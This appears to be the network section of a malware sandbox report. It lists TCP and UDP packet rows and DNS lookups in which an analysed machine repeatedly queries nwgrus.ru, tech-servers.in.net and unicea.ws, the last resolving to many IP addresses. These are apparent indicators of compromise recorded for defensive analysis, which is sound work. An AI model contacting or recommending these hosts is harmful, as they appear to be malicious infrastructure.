Oct 19, 2024 06:46:05.412533998 CEST	61686	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:46:05.412570000 CEST	61686	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:46:05.420882940 CEST	80	61686	116.58.10.60	192.168.2.4
Oct 19, 2024 06:46:05.424128056 CEST	80	61686	116.58.10.60	192.168.2.4
Oct 19, 2024 06:46:06.755083084 CEST	80	61686	116.58.10.60	192.168.2.4
Oct 19, 2024 06:46:06.755172968 CEST	61686	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:46:06.755274057 CEST	61686	80	192.168.2.4	116.58.10.60
Oct 19, 2024 06:46:06.760132074 CEST	80	61686	116.58.10.60	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 19, 2024 06:42:22.519059896 CEST	49190	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:42:22.786690950 CEST	53	49190	1.1.1.1	192.168.2.4
Oct 19, 2024 06:42:22.789664030 CEST	51985	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:42:22.798180103 CEST	53	51985	1.1.1.1	192.168.2.4
Oct 19, 2024 06:42:22.800153017 CEST	62230	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:42:23.805304050 CEST	62230	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:42:24.803971052 CEST	62230	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:42:25.007183075 CEST	53	62230	1.1.1.1	192.168.2.4
Oct 19, 2024 06:42:25.007201910 CEST	53	62230	1.1.1.1	192.168.2.4
Oct 19, 2024 06:42:25.007211924 CEST	53	62230	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:30.912147045 CEST	49311	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:31.060017109 CEST	53	49311	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:31.062853098 CEST	60996	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:31.071732044 CEST	53	60996	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:36.125165939 CEST	59978	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:36.173964024 CEST	53	59978	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:36.176858902 CEST	61559	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:36.195174932 CEST	53	61559	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:41.562773943 CEST	49342	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:41.609564066 CEST	53	49342	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:41.612140894 CEST	58048	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:41.620878935 CEST	53	58048	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:47.169883966 CEST	55779	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:47.218054056 CEST	53	55779	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:47.236016989 CEST	51451	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:47.245474100 CEST	53	51451	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:52.408652067 CEST	64073	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:52.678066969 CEST	53	64073	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:52.685308933 CEST	51110	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:52.813299894 CEST	53	51110	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:57.318674088 CEST	64212	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:57.465337038 CEST	53	64212	1.1.1.1	192.168.2.4
Oct 19, 2024 06:43:57.471810102 CEST	65096	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:43:57.480257034 CEST	53	65096	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:06.329474926 CEST	50729	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:06.378844023 CEST	53	50729	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:06.387263060 CEST	52581	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:06.399254084 CEST	53	52581	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:11.747459888 CEST	52438	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:11.795420885 CEST	53	52438	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:11.804964066 CEST	52479	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:11.812458992 CEST	53	52479	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:17.713236094 CEST	61402	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:17.761531115 CEST	53	61402	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:17.770863056 CEST	56095	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:17.780821085 CEST	53	56095	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:23.772494078 CEST	63320	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:23.920578003 CEST	53	63320	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:23.927993059 CEST	63004	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:23.941919088 CEST	53	63004	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:29.448184013 CEST	64396	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:29.496779919 CEST	53	64396	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:29.502087116 CEST	55163	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:29.511501074 CEST	53	55163	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:35.522624969 CEST	53637	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:35.670763969 CEST	53	53637	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:35.679120064 CEST	62891	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:35.692931890 CEST	53	62891	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:41.658227921 CEST	57923	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:41.894262075 CEST	53	57923	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:41.903820992 CEST	63870	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:41.916258097 CEST	53	63870	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:47.520014048 CEST	64959	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:47.568840027 CEST	53	64959	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:47.579088926 CEST	57125	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:47.588046074 CEST	53	57125	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:53.154050112 CEST	55077	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:53.407582998 CEST	53	55077	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:53.415479898 CEST	55342	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:53.424381018 CEST	53	55342	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:58.602396011 CEST	59444	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:58.652081966 CEST	53	59444	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:58.660918951 CEST	61099	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:58.670176983 CEST	53	61099	1.1.1.1	192.168.2.4
Oct 19, 2024 06:44:58.675455093 CEST	50176	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:44:58.967871904 CEST	53	50176	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:05.364461899 CEST	58841	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:05.594314098 CEST	53	58841	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:05.602200031 CEST	63412	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:05.609821081 CEST	53	63412	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:11.606097937 CEST	63029	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:11.752604008 CEST	53	63029	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:11.758584976 CEST	51324	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:11.765506029 CEST	53	51324	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:18.213108063 CEST	59897	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:18.366010904 CEST	53	59897	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:18.385843992 CEST	63030	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:18.409480095 CEST	53	63030	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:24.590960979 CEST	58504	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:24.701432943 CEST	53	58504	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:24.712013006 CEST	63350	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:24.723958015 CEST	53	63350	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:30.832644939 CEST	54143	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:31.514403105 CEST	53	54143	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:31.520375967 CEST	57033	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:31.534745932 CEST	53	57033	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:37.829662085 CEST	55607	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:37.840265036 CEST	53	55607	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:37.843049049 CEST	62821	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:37.855453968 CEST	53	62821	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:43.706187963 CEST	49857	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:43.883142948 CEST	49857	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:43.967185974 CEST	53	49857	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:43.967202902 CEST	53	49857	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:43.975368977 CEST	64927	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:43.985213995 CEST	53	64927	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:49.836412907 CEST	65473	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:50.024265051 CEST	65473	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:50.036670923 CEST	53	65473	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:50.083595991 CEST	53	65473	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:50.840441942 CEST	61393	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:50.850619078 CEST	53	61393	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:57.132236004 CEST	59953	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:57.305071115 CEST	59953	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:57.396687984 CEST	53	59953	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:57.396701097 CEST	53	59953	1.1.1.1	192.168.2.4
Oct 19, 2024 06:45:57.401525974 CEST	49860	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:45:57.421417952 CEST	53	49860	1.1.1.1	192.168.2.4
Oct 19, 2024 06:46:05.335688114 CEST	59598	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:46:05.385740995 CEST	53	59598	1.1.1.1	192.168.2.4
Oct 19, 2024 06:46:05.390922070 CEST	61069	53	192.168.2.4	1.1.1.1
Oct 19, 2024 06:46:05.401643991 CEST	53	61069	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 19, 2024 06:42:22.519059896 CEST	192.168.2.4	1.1.1.1	0xa325	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:22.789664030 CEST	192.168.2.4	1.1.1.1	0xa58f	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:22.800153017 CEST	192.168.2.4	1.1.1.1	0xec8	Standard query (0)	unicea.ws	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:23.805304050 CEST	192.168.2.4	1.1.1.1	0xec8	Standard query (0)	unicea.ws	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:24.803971052 CEST	192.168.2.4	1.1.1.1	0xec8	Standard query (0)	unicea.ws	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:30.912147045 CEST	192.168.2.4	1.1.1.1	0xb757	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:31.062853098 CEST	192.168.2.4	1.1.1.1	0x1739	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:36.125165939 CEST	192.168.2.4	1.1.1.1	0x5d4d	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:36.176858902 CEST	192.168.2.4	1.1.1.1	0xc493	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:41.562773943 CEST	192.168.2.4	1.1.1.1	0x55ca	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:41.612140894 CEST	192.168.2.4	1.1.1.1	0xcd0e	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:47.169883966 CEST	192.168.2.4	1.1.1.1	0x3f60	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:47.236016989 CEST	192.168.2.4	1.1.1.1	0x8ebc	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:52.408652067 CEST	192.168.2.4	1.1.1.1	0xfabf	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:52.685308933 CEST	192.168.2.4	1.1.1.1	0x8d77	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:57.318674088 CEST	192.168.2.4	1.1.1.1	0x15cc	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:57.471810102 CEST	192.168.2.4	1.1.1.1	0x299	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:06.329474926 CEST	192.168.2.4	1.1.1.1	0xbf51	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:06.387263060 CEST	192.168.2.4	1.1.1.1	0x56af	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:11.747459888 CEST	192.168.2.4	1.1.1.1	0x4202	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:11.804964066 CEST	192.168.2.4	1.1.1.1	0x6ebd	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:17.713236094 CEST	192.168.2.4	1.1.1.1	0xe53	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:17.770863056 CEST	192.168.2.4	1.1.1.1	0x1a0	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:23.772494078 CEST	192.168.2.4	1.1.1.1	0xd03f	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:23.927993059 CEST	192.168.2.4	1.1.1.1	0xa5e	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:29.448184013 CEST	192.168.2.4	1.1.1.1	0x28f4	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:29.502087116 CEST	192.168.2.4	1.1.1.1	0x2c92	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:35.522624969 CEST	192.168.2.4	1.1.1.1	0x5a75	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:35.679120064 CEST	192.168.2.4	1.1.1.1	0x43fe	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:41.658227921 CEST	192.168.2.4	1.1.1.1	0x4604	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:41.903820992 CEST	192.168.2.4	1.1.1.1	0x84e3	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:47.520014048 CEST	192.168.2.4	1.1.1.1	0xab35	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:47.579088926 CEST	192.168.2.4	1.1.1.1	0x9c3a	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:53.154050112 CEST	192.168.2.4	1.1.1.1	0x84e9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:53.415479898 CEST	192.168.2.4	1.1.1.1	0x1446	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.602396011 CEST	192.168.2.4	1.1.1.1	0x7985	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.660918951 CEST	192.168.2.4	1.1.1.1	0x277d	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:58.675455093 CEST	192.168.2.4	1.1.1.1	0x4733	Standard query (0)	unicea.ws	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:05.364461899 CEST	192.168.2.4	1.1.1.1	0xd741	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:05.602200031 CEST	192.168.2.4	1.1.1.1	0x40e3	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:11.606097937 CEST	192.168.2.4	1.1.1.1	0x84d7	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:11.758584976 CEST	192.168.2.4	1.1.1.1	0x457d	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:18.213108063 CEST	192.168.2.4	1.1.1.1	0x24f9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:18.385843992 CEST	192.168.2.4	1.1.1.1	0x3e84	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:24.590960979 CEST	192.168.2.4	1.1.1.1	0xd2c5	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:24.712013006 CEST	192.168.2.4	1.1.1.1	0x34ae	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:30.832644939 CEST	192.168.2.4	1.1.1.1	0x9ad2	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:31.520375967 CEST	192.168.2.4	1.1.1.1	0x1344	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:37.829662085 CEST	192.168.2.4	1.1.1.1	0xa13	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:37.843049049 CEST	192.168.2.4	1.1.1.1	0xde4a	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:43.706187963 CEST	192.168.2.4	1.1.1.1	0xc819	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:43.883142948 CEST	192.168.2.4	1.1.1.1	0xc819	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:43.975368977 CEST	192.168.2.4	1.1.1.1	0xc5be	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:49.836412907 CEST	192.168.2.4	1.1.1.1	0xe383	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:50.024265051 CEST	192.168.2.4	1.1.1.1	0xe383	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:50.840441942 CEST	192.168.2.4	1.1.1.1	0x2892	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:57.132236004 CEST	192.168.2.4	1.1.1.1	0xfde9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:57.305071115 CEST	192.168.2.4	1.1.1.1	0xfde9	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:45:57.401525974 CEST	192.168.2.4	1.1.1.1	0x5711	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:46:05.335688114 CEST	192.168.2.4	1.1.1.1	0x78b4	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:46:05.390922070 CEST	192.168.2.4	1.1.1.1	0xac92	Standard query (0)	tech-servers.in.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 19, 2024 06:42:22.786690950 CEST	1.1.1.1	192.168.2.4	0xa325	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:22.798180103 CEST	1.1.1.1	192.168.2.4	0xa58f	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		186.137.126.27	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007183075 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		218.111.151.79	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		186.137.126.27	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007201910 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		218.111.151.79	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		123.213.233.131	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		190.147.2.86	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		46.100.50.5	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		186.137.126.27	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		78.89.199.216	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:42:25.007211924 CEST	1.1.1.1	192.168.2.4	0xec8	No error (0)	unicea.ws		218.111.151.79	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:31.060017109 CEST	1.1.1.1	192.168.2.4	0xb757	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:31.071732044 CEST	1.1.1.1	192.168.2.4	0x1739	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:36.173964024 CEST	1.1.1.1	192.168.2.4	0x5d4d	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:36.195174932 CEST	1.1.1.1	192.168.2.4	0xc493	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:41.609564066 CEST	1.1.1.1	192.168.2.4	0x55ca	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:41.620878935 CEST	1.1.1.1	192.168.2.4	0xcd0e	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:47.218054056 CEST	1.1.1.1	192.168.2.4	0x3f60	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:47.245474100 CEST	1.1.1.1	192.168.2.4	0x8ebc	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:52.678066969 CEST	1.1.1.1	192.168.2.4	0xfabf	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:52.813299894 CEST	1.1.1.1	192.168.2.4	0x8d77	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:57.465337038 CEST	1.1.1.1	192.168.2.4	0x15cc	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:43:57.480257034 CEST	1.1.1.1	192.168.2.4	0x299	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:06.378844023 CEST	1.1.1.1	192.168.2.4	0xbf51	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:06.399254084 CEST	1.1.1.1	192.168.2.4	0x56af	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:11.795420885 CEST	1.1.1.1	192.168.2.4	0x4202	Name error (3)	nwgrus.ru	none	none	A (IP address)	IN (0x0001)	false
Oct 19, 2024 06:44:11.812458992 CEST	1.1.1.1	192.168.2.4	0x6ebd	Name error (3)	tech-servers.in.net	none	none	A (IP address)	IN (0x0001)	false
